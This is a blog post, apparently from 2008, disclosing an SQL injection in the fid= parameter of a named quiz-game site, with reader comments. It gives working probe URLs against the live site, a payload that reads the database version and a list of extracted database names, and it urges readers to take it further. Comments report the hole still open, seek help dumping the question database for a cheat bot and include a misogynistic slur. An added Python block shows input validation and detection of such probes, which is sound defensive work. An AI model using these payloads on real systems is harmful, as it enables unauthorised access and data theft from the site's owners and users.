Posted on November 24th, 2008
Yes… again. A short while ago I found the companyid= parameter to be vulnerable. At that time I did not publish the syntax for extracting the data. The admins received an e-mail and secured the output. Conquiztador is a game played in many countries on the same platform. Only the Romanian one had the logoclick.php?companyid= parameter added. What do you think it was for? For advertising. And for whom? Mostly, of course, for the companies belonging to the Pro trust.
But… and I say but, because this time the parameter found vulnerable is global, valid for the platforms of all the countries where the game is played. (A simple Google search for inurl:"forum_topic.php?fid=" will convince you.) So the vulnerable parameter is fid= in forum_topic.php?fid= . Still, to exploit the vulnerability we need some SQL knowledge, because the results are not displayed simply, in clear text.
But anyone can do a small exercise. Let's take the address: http://www.conquiztador.ro/forum_topic.php?fid=5
and find the number of columns: http://www.conquiztador.ro/forum_topic.php?fid=5+order+by+1/* true, meaning the original page appears. We replace 1 with 2 and so on up to 5, true… At 6 we get http://www.conquiztador.ro/forum_topic.php?fid=5+order+by+6/* an error, so we have 5 columns.
Now let's find the database version
select 1,unhex(hex(@@version)),3,4,5 gives the result: 1, 5.0.32-Debian_7etch3-log, 3, 4, 5
The database names are:
[*] cq_ro
[*] information_schema
[*] mysql
[*] mysql_old
[*] test
The one that interests us is cq_ro. The tables of this database are:
The rest is up to you.
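
The defensive side of the fid= issue described above, as an added example that is not part of the original post or the site's code: the value is accepted only as a plain integer and bound as a query parameter, and the same check flags probing requests in an access log. The table and column names, the in-memory SQLite stand-in for the MySQL backend, and the combined-format log lines are assumptions constructed for illustration.

```python
import re
import sqlite3
from urllib.parse import urlsplit, parse_qs

FID_RE = re.compile(r"[0-9]{1,9}")  # a forum id is a short decimal integer
REQ_RE = re.compile(r'(\S+) .*?"(?:GET|POST) (\S+) HTTP')

# Constructed access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Nov/2008:10:00:01 +0200] "GET /forum_topic.php?fid=5 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [24/Nov/2008:10:00:09 +0200] "GET /forum_topic.php?fid=5+order+by+6/* HTTP/1.1" 200 312',
    '198.51.100.7 - - [24/Nov/2008:10:00:15 +0200] "GET /index.php HTTP/1.1" 200 900',
]

def parse_fid(raw):
    """Return fid as an int, or None for anything other than plain digits."""
    return int(raw) if raw is not None and FID_RE.fullmatch(raw) else None

def make_demo_db():
    """In-memory stand-in for the forum table; the schema is an assumption."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE forum_topic (id INTEGER, fid INTEGER, title TEXT)")
    db.execute("INSERT INTO forum_topic VALUES (1, 5, 'constructed topic')")
    return db

def fetch_topics(db, raw_fid):
    """Hardened lookup: validate the type, then bind the value as a parameter."""
    fid = parse_fid(raw_fid)
    if fid is None:
        return None  # caller answers HTTP 400; nothing reaches the SQL engine
    return db.execute(
        "SELECT id, title FROM forum_topic WHERE fid = ?", (fid,)
    ).fetchall()

def suspicious_requests(log_lines):
    """Return (client, decoded fid) for forum_topic.php hits with a non-integer fid."""
    hits = []
    for line in log_lines:
        m = REQ_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group(2))
        if not url.path.endswith("/forum_topic.php"):
            continue
        for raw in parse_qs(url.query, keep_blank_values=True).get("fid", []):
            if parse_fid(raw) is None:
                hits.append((m.group(1), raw))
    return hits
```

Because the rejected request never reaches the database, the true/error difference that the ORDER BY probe relies on disappears, and the log check surfaces the client that sent it.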

December 9th, 2008 at 9:54 am
[...] received the following link from Danv today. If you read the post on hackersblog you will see how trivial it is [...]
December 9th, 2008 at 2:08 pm
the best part is that they still haven't secured the parameter, so it is still vulnerable (notifying them was pointless)
December 17th, 2008 at 9:14 pm
I tried to get an explanation from the moderators and that oana gave me a ban. they behave like they did when the codes appeared. I think it's hard for them to admit when they are wrong, and the moderators are more inept than the old ones. that's what happens when you put stupid women in charge
December 17th, 2008 at 9:14 pm
[...] For the rest and for more information, read the whole article on HackersBlog.org! [...]
January 2nd, 2009 at 10:47 pm
Btw, do you know why their site runs so "well"? Since around May, I think, they introduced the RSA encryption system in the game's connection… with that many prime numbers it seems normal to me that it hangs
… And decryption takes me about 2-3 seconds. Does anyone know whether finding the variables from the javascript still works?
January 4th, 2009 at 12:46 am
From what I understand, the Romanian version has much more efficient encryption than the other countries' versions, and the chances of getting past this encryption and creating a new cheat have dropped considerably.
February 26th, 2009 at 5:40 am
This site is as interesting as it is informative. Best regards!
March 20th, 2009 at 6:21 am
Nice work chief
March 20th, 2009 at 6:23 am
Spent some great time in your site, really enjoyed it
March 20th, 2009 at 6:24 am
Extremely lovely site. Very impressed about all the lessons there are to learn and to know how much help is there also. Keep up the great work
March 12th, 2010 at 5:22 pm
Hello! I don't know whether I did the right thing by posting here. I'm new here and thought I would ask for a little help (advice, opinion). I made a program for conquiztador and a collection bot, but I don't have the patience to sit and collect them, since in my opinion there should be another way. I would like to extract all the questions from the db, but from what I have tried it is no longer vulnerable to sqli. Thank you, any advice is welcome. Have a good day
April 10th, 2010 at 2:05 pm
@ Nimeni Altul I'll help you with the collection bot too. ID: marius_ionuty